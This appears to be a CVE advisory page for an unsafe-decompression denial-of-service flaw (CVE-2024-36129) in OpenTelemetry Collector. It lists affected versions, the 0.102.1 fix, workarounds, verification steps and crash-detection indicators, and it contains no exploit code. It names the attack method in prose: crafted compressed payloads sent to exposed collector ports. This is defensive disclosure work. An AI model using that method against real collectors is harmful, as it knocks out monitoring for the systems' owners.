Login Sign Up

CVE-2024-36129

8.2 HIGH
Denial of Service

📋 TL;DR

CVE-2024-36129 is an unsafe decompression vulnerability in OpenTelemetry Collector that allows unauthenticated attackers to crash the service via excessive memory consumption (denial of service). This affects all OpenTelemetry Collector deployments using vulnerable versions that accept compressed data. The vulnerability is fixed in version 0.102.1.

💻 Affected Systems

Products:
  • OpenTelemetry Collector
Versions: All versions before 0.102.1
Operating Systems: All platforms running OpenTelemetry Collector
Default Config Vulnerable: ⚠️ Yes
Notes: Vulnerable when collector accepts compressed data via HTTP or gRPC endpoints. Also affects confighttp module before 0.102.0 and configgrpc module before 0.102.1.

📦 What is this software?

Configgrpc by Opentelemetry

View all CVEs affecting Configgrpc →

Confighttp by Opentelemetry

View all CVEs affecting Confighttp →

Opentelemetry Collector by Opentelemetry

View all CVEs affecting Opentelemetry Collector →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete service outage of OpenTelemetry Collector leading to loss of telemetry data collection and potential cascading failures in monitoring systems.

🟠

Likely Case

Service crashes and restarts, causing gaps in telemetry data collection and potential alerting failures.

🟢

If Mitigated

Minimal impact with proper network segmentation and rate limiting preventing exploitation attempts.

🌐 Internet-Facing: HIGH - Unauthenticated attackers can exploit this remotely without any credentials.
🏢 Internal Only: MEDIUM - Internal attackers or compromised systems could still exploit this, but requires network access.

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

The vulnerability is straightforward to exploit by sending specially crafted compressed payloads to vulnerable endpoints.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 0.102.1

Vendor Advisory: https://github.com/open-telemetry/opentelemetry-collector/security/advisories/GHSA-c74f-6mfw-mm4v

Restart Required: Yes

Instructions:

1. Update OpenTelemetry Collector to version 0.102.1 or later. 2. Update confighttp module to 0.102.0+ and configgrpc module to 0.102.1+. 3. Restart all collector instances. 4. Verify the update was successful.

🔧 Temporary Workarounds

Disable compression

all

Configure collectors to reject compressed payloads if not required

Configure collector to set 'compression: none' in receiver configurations

Network segmentation

all

Restrict access to collector endpoints to trusted sources only

Use firewall rules to limit access to collector ports (e.g., 4317, 4318, 55680, 55681)

🧯 If You Can't Patch

  • Implement strict network access controls to limit who can send data to collectors
  • Deploy rate limiting at network or application level to prevent exploitation attempts

🔍 How to Verify

Check if Vulnerable:

Check OpenTelemetry Collector version: if version < 0.102.1, you are vulnerable. Also check confighttp module < 0.102.0 or configgrpc module < 0.102.1.

Check Version:

otelcol --version

Verify Fix Applied:

Verify version is 0.102.1 or higher and test that collector accepts compressed data without crashing.

📡 Detection & Monitoring

Log Indicators:

  • Collector process crashes or restarts
  • Memory usage spikes followed by crashes
  • Errors related to decompression or memory allocation

Network Indicators:

  • Unusually large compressed payloads sent to collector endpoints
  • Multiple rapid connection attempts to collector ports

SIEM Query:

source="otel-collector" AND ("panic" OR "out of memory" OR "decompression failed")

📊 Metadata

CVE ID: CVE-2024-36129
CVSS v3 Score: 8.2 (HIGH)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
CWE: CWE-119
Published: June 5, 2024
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-36129, you might also want to check these:

CVE-2024-23613 10.0

A critical buffer overflow vulnerability in Symantec Deployment Solution 7.9 allows remote, unauthen...

Same vulnerability type (CWE-119)
CVE-2024-23615 10.0

A critical buffer overflow vulnerability in Symantec Messaging Gateway allows remote unauthenticated...

Same vulnerability type (CWE-119)
CVE-2026-2776 10.0

This CVE describes a sandbox escape vulnerability in Firefox's Telemetry component due to incorrect ...

Same vulnerability type (CWE-119)